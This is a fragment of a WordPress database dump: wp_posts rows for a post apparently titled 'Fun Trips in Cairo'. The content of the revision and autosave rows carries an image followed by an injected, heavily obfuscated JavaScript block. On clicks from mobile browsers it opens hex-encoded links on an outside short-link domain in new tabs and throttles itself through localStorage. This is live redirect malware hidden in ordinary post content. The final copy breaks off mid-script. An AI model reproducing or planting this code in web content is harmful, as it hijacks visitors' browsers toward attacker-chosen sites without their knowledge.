(5433,1,'2023-08-28 04:53:03','2023-08-28 04:53:03','','b69e5201-9176-43d7-b10e-476efe69ecf1','','inherit','open','closed','','b69e5201-9176-43d7-b10e-476efe69ecf1','','','2023-08-28 04:53:03','2023-08-28 04:53:03','',5430,'https://gsw2023.com/wp-content/uploads/2023/08/b69e5201-9176-43d7-b10e-476efe69ecf1.jpg',0,'attachment','image/jpeg',0),
(5434,1,'2023-08-28 04:54:15','2023-08-28 04:54:15','<img src=\"https://gsw2023.com/wp-content/uploads/2023/08/b69e5201-9176-43d7-b10e-476efe69ecf1.jpg\" alt=\"\" width=\"905\" height=\"1280\" class=\"alignnone size-full wp-image-5433\" /><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Fun Trips in Cairo','','inherit','closed','closed','','5430-revision-v1','','','2023-08-28 04:54:15','2023-08-28 04:54:15','',5430,'https://gsw2023.com/?p=5434',0,'revision','',0),
(5435,1,'2023-08-28 05:00:55','2023-08-28 05:00:55','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span><img src=\"https://gsw2023.com/wp-content/uploads/2023/08/b69e5201-9176-43d7-b10e-476efe69ecf1.jpg\" alt=\"\" width=\"1250\" height=\"1500\" class=\"alignnone size-full wp-image-5433\" /><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Fun Trips in Cairo','','inherit','closed','closed','','5430-autosave-v1','','','2023-08-28 05:00:55','2023-08-28 05:00:55','',5430,'https://gsw2023.com/?p=5435',0,'revision','',0),
(5436,1,'2023-08-28 04:57:22','2023-08-28 04:57:22','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span><img src=\"https://gsw2023.com/wp-content/uploads/2023/08/b69e5201-9176-43d7-b10e-476efe69ecf1.jpg\" alt=\"\" width=\"1250\" height=\"1500\" class=\"alignnone size-full wp-image-5433\" /><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 